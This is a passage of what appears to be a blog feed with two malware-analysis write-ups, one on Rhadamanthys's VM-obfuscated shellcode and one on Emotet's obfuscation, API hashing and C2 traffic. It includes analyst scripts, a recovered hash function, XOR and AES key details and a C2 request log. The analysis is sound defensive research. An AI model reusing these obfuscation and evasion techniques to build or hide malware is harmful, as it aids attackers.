not_id = ~id & 0xffffffff
exp2 = get_relatively_prime(not_id | 1, phi_n)
for k in keys: aes_key.append(rsa_decrypt(k, exp2, n, phi_n))
#decode the key blob from its decimal representation
aes_key_bytes = b''
for k in aes_key: aes_key_bytes += convert_from_decimal(str(k))
return aes_decrypt(ciphertext, aes_key_bytes)
Rhadamanthys is an infostealer that has recently been spreading through malicious Google ads. The program decrypts several layers of shellcode before retrieving the second stage of its payload from its C2 server. This writeup provides an excellent explanation of the process, but I wanted to look more closely at the obfuscation methods used to hide the shellcode.
The sample I used in this writeup is available at MalwareBazaar here.
Looking at the strings in the sample, I immediately noticed a very long string beginning with 7ARQAAAASCI
. This string appears in every sample of Rhadamanthys I’ve seen so far.
Since the string contained only numbers and uppercase letters, I suspected that base32 was being used, but my attempts to decode the string as base32 failed. In the process of looking for a decryption function, I found what appeared to be operations associated with a virtual machine:
Upon closer inspection, I found what appeared to be the opcodes of the virtual machine in memory when this function was called, at an offset of 0xc
from the first argument. Each of the opcodes is stored as a value from 0 to 52, sometimes followed by a single operand in the form of a 32-bit integer.
The opcodes are also hard-coded in the memory of the program:
I found that there was a layer of obfuscation designed to obscure which opcodes corresponded to which operations. The program stores a table of 53 values:
[4203120, 4203138, 4203140, 4204027, 4204069, 4203673, 4204001, 4204014, 4203142, 4203215, 4204161, 4204224, 4204275, 4204326, 4204377, 4204428, 4204479, 4204530, 4204581, 4204632, 4204683, 4204734, 4204814, 4204894, 4204974, 4205054, 4205134, 4203405, 4203349, 4203294, 4203531, 4203495, 4203461, 4203565, 4203621, 4205770, 4205802, 4205214, 4205240, 4205275, 4205310, 4205346, 4205383, 4205419, 4205456, 4205492, 4205528, 4205563, 4205598, 4205633, 4205659, 4205696, 4205733]
When an instruction is run, the program retrieves the value at the index of the corresponding opcode. Then, a long switch statement compares this value to the index of possible values for each instruction.
For instance, the XOR instruction corresponds to a value of 0x402c1e
, which is at index 48 of the array. Therefore the opcode for XOR is 48.
There are 52 different instructions, though some of them appear to be duplicates. There were a few instructions I wasn’t able to figure out (especially the ones related to manipulation of floating-point values). These are marked with a ?
in the disassembly script below. If I have time later, I may go back and figure out what these instructions are.
The virtual machine is stack-based, with most operations acting on the top of the stack and the value directly below it. We have the option to push immediate values (push_imm
) or values at a memory address relative to a given offset (push_indirect
).
Some of the opcodes call other functions in the program. Most importantly, the instruction I refer to as get string
in the disassembly retrieves a sequence of bytes from the long, seemingly base32-encoded string I mentioned earlier.
The script I used to disassemble the instructions is given below:
import binascii
op_dict = {0: 4203120, 1: 4203138, 2: 4203140, 3: 4204027, 4: 4204069, 5: 4203673, 6: 4204001, 7: 4204014, 8: 4203142, 9: 4203215, 10: 4204161, 11: 4204224, 12: 4204275, 13: 4204326, 14: 4204377, 15: 4204428, 16: 4204479, 17: 4204530, 18: 4204581, 19: 4204632, 20: 4204683, 21: 4204734, 22: 4204814, 23: 4204894, 24: 4204974, 25: 4205054, 26: 4205134, 27: 4203405, 28: 4203349, 29: 4203294, 30: 4203531, 31: 4203495, 32: 4203461, 33: 4203565, 34: 4203621, 35: 4205770, 36: 4205802, 37: 4205214, 38: 4205240, 39: 4205275, 40: 4205310, 41: 4205346, 42: 4205383, 43: 4205419, 44: 4205456, 45: 4205492, 46: 4205528, 47: 4205563, 48: 4205598, 49: 4205633, 50: 4205659, 51: 4205696, 52: 4205733}
has_operand = [4203142, 4203215, 4203565, 4203621, 4206427, 4204224, 4204275, 4204326, 4204377, 4204428, 4204479, 4204530, 4204581, 4204632, 4204683, 4204734, 4204814, 4204894, 4204974, 4205054, 4205134, 4204069, 4204027]
insn_names = {4203120: 'halt', 4203140: 'nop', 4203142: 'push_imm', 4203215: 'push_indirect', 4203294: 'load', 4203349: 'load', 4203405: 'load', 4203495: 'pop word', 4203461: 'pop dword', 4203531: 'pop byte', 4203565: 'pop_indirect', 4204101: 'call sub_402e1d', 4203673: 'get string', 4204001: '?', 4204014: 'pop', 4204027: '?', 4204069: '?', 4204161: '?', 4204224: 'jeq', 4204275: 'jne', 4204326: 'jl', 4204377: 'jle', 4204428: 'jg', 4204479: 'jge', 4204530: 'jl', 4204581: 'jle', 4204632: 'jg', 4204683: 'jge', 4204734: 'jne? [float]', 4204814: 'je? [float]', 4204894: 'jae? [float]', 4204974: 'ja? [float]', 2107902: 'jbe? [float]', 4205134: 'jb? [float]', 4205214: 'not', 4205240: 'add', 4205275: 'sub', 4205310: 'divs', 4205346: 'divu', 4205383: 'mods', 4205419: 'modu', 4205456: 'mul', 4205492: 'mul', 4205528: 'and', 4205563: 'or', 4205598: 'xor', 4205633: 'not', 4205659: 'shl', 4205696: 'asr', 4205733: 'lsr', 4205770: '?', 4205802: '?'}
def get_op_name(n):
return insn_names[op_dict[n]]
insns_hex = open('ops_hexdump.txt').read().replace(' ','')
insns = []
full_str = ''
has_operand_flag = False
for i in range(0, len(insns_hex), 8):
insn_str = insns_hex[i:i+8]
insn = int.from_bytes(binascii.unhexlify(insn_str), 'little')
if(has_operand_flag):
full_str += hex(int.from_bytes(binascii.unhexlify(insn_str), 'little'))
print(full_str)
full_str = ''
has_operand_flag = False
else:
try:
addr = op_dict[insn]
if addr in has_operand:
has_operand_flag = True
full_str += hex(i // 8) + ' ' + get_op_name(insn) + ' '
else:
full_str += hex(i // 8) + ' ' + get_op_name(insn) + ' '
print(full_str)
full_str = ''
except:
pass
print('bad', insn_str)
Looking at the disassembly, we can see the program construct several interesting strings. This sequence of instructions loads the string kernel32.dll
into memory:
0x26b push_indirect 0x18
0x26d push_imm 0x6b
0x26f pop byte
0x270 push_indirect 0x19
0x272 push_imm 0x65
0x274 pop byte
0x275 push_indirect 0x1a
0x277 push_imm 0x72
0x279 pop byte
...
Later on, the same process is used to build the strings 41 ? 76 ? 61 ? 73 ? 74
and 73 ? 6E ? 78 ? 68 ? 6B
. The hexadecimal values in these strings spell out Avast
and snxhk
respectively. Some googling reveals that snxhk
is the name of a DLL associated with Avast antivirus. Presumably this means that the program is attempting to evade antivirus, but so far I haven’t looked into the specifics of how it does so.
Eventually, I managed to find something that looked like base32 decryption. This comparison loads a character and checks whether it is between A
and Z
:
0x624 load
0x625 push_imm 0x41
0x627 jl 0x639
0x629 push_indirect 0xc
0x62b load
0x62c push_imm 0x5a
0x62e jg 0x639
And this comparison checks for a character between 4
and 9
:
0x641 load
0x642 push_imm 0x34
0x644 jl 0x659
0x646 push_indirect 0x10
0x648 load
0x649 push_imm 0x39
0x64b jg 0x659
This explains why attempting to decode the base32 earlier failed: the program is using the alphabet [A-Z][4-9]
, rather than the more conventional [A-Z][2-7]
.
There’s still one more step we have to go through before we can decode the long string. The long string contains several sequences of the characters 0
, 1
, and 2
, which aren’t part of the base32 character set that’s being used here.
It may be that these sequences are being used to encode information in a different way, but it’s entirely possible that they’re just there to make it harder to identify the alphabet being used for the base32 encoding. I replaced them all with the character A
before decoding.
At this point, we finally have our result:
We can see that this is the shellcode that’s being run in the second stage of the program.
While I managed to accomplish my original goal of deobfuscating the first layer of shellcode, there’s still a lot more to analyze here. At some point, it would be a good idea for me to identify the VM instructions I didn’t understand and write a better disassembler. Additionally, I need to look into how the strings constructed by the VM are actually being used, especially as they seem to relate to antivirus software.
]]>When I took a course in malware analysis last spring, Emotet was the last sample we analyzed. Because it used some fairly advanced obfuscation techniques, I approached it primarily using dynamic analysis, observing network traffic and seeing what new files were created on the system. However, I was never particularly satisfied with this approach, so I decided to revisit Emotet to try and get a better understanding of what it was really doing.
Specifically, I was looking for the following:
Additionally, this analysis was my first attempt at using Binary Ninja scripting. Many of the functions in this sample follow similar patterns in how they are obfuscated, so it was relatively straightforward to write scripts to rename certain types of functions automatically. This turned out to be a huge time saver, and I’ll definitely be using it more going forward.
The sample I used in this analysis was obtained from vx-underground, and its SHA-256 hash is 3d2b0b17521278ba782e6c83e3df068de10ba1560d97e987ed4975ef6796f5cb
.
Looking at the entropy of the given sample, we can immediately see a section with very high entropy:
This appeared to be the same encrypted resource I had encountered when studying Emotet last semester.
The program obfuscates the use of constant values by defining functions that do nothing except return them:
I wrote a short Binary Ninja plugin to search for functions that do nothing except return a single constant value. When the plugin found one, it automatically renamed the function to show the value it returned.
import binaryninja
from binaryninja.types import Symbol
from binaryninja.enums import SymbolType
# rename the functions that return constants with the values they return
def fix_opaque(view):
for func in view.functions:
for i in func.hlil:
#check if the function immediately returns
if type(func.hlil[0]) == binaryninja.highlevelil.HighLevelILRet:
if(len(func.hlil[0].operands) == 1):
if(type(func.hlil[0].operands[0]) == binaryninja.highlevelil.HighLevelILConst):
#rename the function
name = 'return_' + str(func.hlil[0].operands[0])
s = Symbol(SymbolType.FunctionSymbol, func.start, name)
view.define_user_symbol(s)
binaryninja.plugin.PluginCommand.register("Emotet: Fix Opaque Constants", "rename opaque constants with what they return", fix_opaque)
Additionally, some operations are obfuscated by performing unnecessary operations and then reversing them, causing some functions to appear more complicated than they are: This code appears to be dividing by 9, then immediately multiplying by 9 again.
Upon closer inspection, the function responsible for decrypting the encrypted resource was much less complicated than it appeared. Ignoring all of the unnecessary and unused operations, it appeared to be an XOR using a fixed key.
In fact, looking more closely at the resource, we can directly see what the key must be. The sequence of bytes 35 57 b6 0e 32 52 c2 bc 05 4a 0e 1e df ad 1d fc 40 d8
appears over and over in the resource:
We can guess that these correspond to null bytes in the plaintext, meaning that this sequence of bytes is also the XOR key. Performing the XOR, we find that the encrypted resource is a second DLL, as expected.
The original name of this DLL was X.dll
. Notably, this was a different version than the one I studied in my malware analysis course - that sample called itself Y.dll
. However, the core functionality appeared to be much the same.
The program uses a long sequence of if/else instructions to obscure the true order in which the code is run. Every time a set of instructions is run, a state variable is updated with a constant value. Then, this value is checked to determine what segment of code should be run next. As the sequence of state variables has no pattern to it, the true control flow of the program is not at all clear.
The sequence of state variables is predetermined, so it should theoretically be possible to reconstruct the control flow. I wasn’t able to do this, but I may come back to it once I’m a little more experienced writing plugins for Binary Ninja.
System functions are called by passing a hash of the function’s name to the function sub_1001a607
, which retrieves the correct function based on the hash. Each of the functions from a given library is hashed until a match is found.
I was able to recreate the hashing function being used:
def get_hash(s):
acc = 0
for c in s:
acc = (ord(c) + (acc << 6) + (acc << (((((0x86270b33 // 0x4b) & 0xff) - 0x58) & 0xff) ^ 0xf9)) - acc) & (2**32 - 1)
return acc ^ 0x39709147
I then obtained lists of the names of all standard Windows functions that the program might call. From there, it was possible to construct a lookup table for each function and its hash.
Fortunately, the calls to system functions all followed a predictable format. Every call to a system function was wrapped in a helper function that did nothing but return the result of a system function. Additionally, the value of the hash was hard-coded as an argument, which was enough to determine which system function was being called.
In fact, the pattern was predictable enough that it was possible to search for it and rename each of the helper functions automatically in Binary Ninja:
def get_func_from_hash(view):
func_hash_lookup = {}
# files containing library function names, separated by newlines
for name in ['kernel32_strings.txt','bcrypt_strings.txt','ntdll_strings.txt', 'kernelbase_strings.txt']:
f = open(name).read()
func_names = f.split('\n')
for func in func_names: func_hash_lookup[get_hash(func)] = func
#rename the functions
get_function = view.get_functions_at(0x10002309)[0]
for func in get_function.callers:
#call to get_function is always the last instruction
if type(func.hlil[-1]) == binaryninja.highlevelil.HighLevelILRet:
op = func.hlil[-1].operands[0]
if(type(op) == binaryninja.highlevelil.HighLevelILCall):
try:
#value of hash is the third argument to get_function
args = op.operands[0].params
func_hash = args[2].value.value
try:
name = 'do_' + func_hash_lookup[func_hash]
s = Symbol(SymbolType.FunctionSymbol, func.start, name)
view.define_user_symbol(s)
except:
print("[Emotet] no hash match found for", func_hash)
except:
print("[Emotet] function doesn't match expected format")
At this point, the system functions were fully deobfuscated. This revealed that sub_1000ac95
was making calls to network-related functions such as InternetConnectW
and HttpOpenRequestW
, and that sub_1000d223
was calling several BCrypt functions. Both of these subroutines seemed worthy of further investigation.
Now that I knew BCrypt was being used, I set a breakpoint at BCryptEncrypt. The second argument to BCryptEncrypt is a pointer to the data to be encrypted. It was difficult to tell what everything in this data buffer was, but it did contain the name of the infected computer, so my guess is that it’s all identifying information of some kind.
The first argument to BCryptEncrypt is a BCRYPT_KEY_HANDLE
struct corresponding to the encryption key. I eventually noticed a 32-byte value that looked like the key itself. This eventually proved to be an AES key in CBC mode, using an IV of zero.
The program repeatedly attempts to contact its C2 servers at port 80, 443, 7080, or 8080. Each request is of a form similar to the following:
[2022-12-24 11:04:38] [65813] [https_443_tcp 67312] [10.0.0.3:44624] connect
[2022-12-24 11:04:38] [65813] [https_443_tcp 67312] [10.0.0.3:44624] recv: GET /jgmVJehRSbWmVZpyyHuYgnsxkTkjFswtLPOWMdaKBjWknn HTTP/1.1
[2022-12-24 11:04:38] [65813] [https_443_tcp 67312} [10.0.0.3:44624] recv: Cookie: XFGojYhNm=qB51M5FmBrQr2QL0h9q0d+j9/0v0yL31buQC3c13xyhOhwig7oSz5qF2J1IproW5k6uhWeKLV0vfQp6DL+d8taRstSvV7syWiYYQ7b0fEv4ka+UYR4Lr4CC9U/UJsYcElg6w1lp9hqLa3YZ1CGybtymAf+RMMC6rGZTrBcRhRHubbqHJw3T3rJ62/DZBuav5+cxsp3mu+laqkR3MfPyVx/jlLnZQODV7JOi2bBTGvVy7cewAqg3owVYcIdRnR92DjVRQOQUikQbCkTwlJ+bKnZ038J3FF+CWjeBOOCAY8BQrTGeMGvGucjgrkzWYDwpQ
The base64-encoded data in the Cookie
parameter contains the AES-encrypted data discussed earlier. Unfortunately, without knowing what kind of response the C2 server would send back, I wasn’t able to progress further.
In the end, I was able to figure out how to do most of the deobfuscation I had wanted to do. Once I discovered the hash function that was being used to call Windows library functions, the sample was much easier to understand. In addition, I’m definitely going to spend more time learning Binary Ninja scripting, as it proved to be extremely helpful for this sample.
]]>